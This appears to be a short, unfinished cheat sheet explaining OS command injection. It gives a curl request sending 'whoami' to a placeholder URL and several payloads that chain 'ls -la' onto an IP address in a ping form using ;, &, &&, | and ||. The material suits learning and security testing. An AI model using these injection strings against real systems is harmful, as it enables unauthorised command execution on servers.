OS Command injection (WIP)
#We send a petition with a command
curl -X POST http://url/? -d "cmd=whoami"
#If being handled by system(), it will respond with the output of the command, letting us we can talk to the internal shell#A form receives the IP as input and executes the ping command
8.8.8.8
#Example output
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=26.4 ms
...
#Ww see that it works like the following command inside
ping $input8.8.8.8; ls -la
8.8.8.8 & ls -la
8.8.8.8 && ls -la
8.8.8.8 | ls -la
8.8.8.8 || ls -laLast updated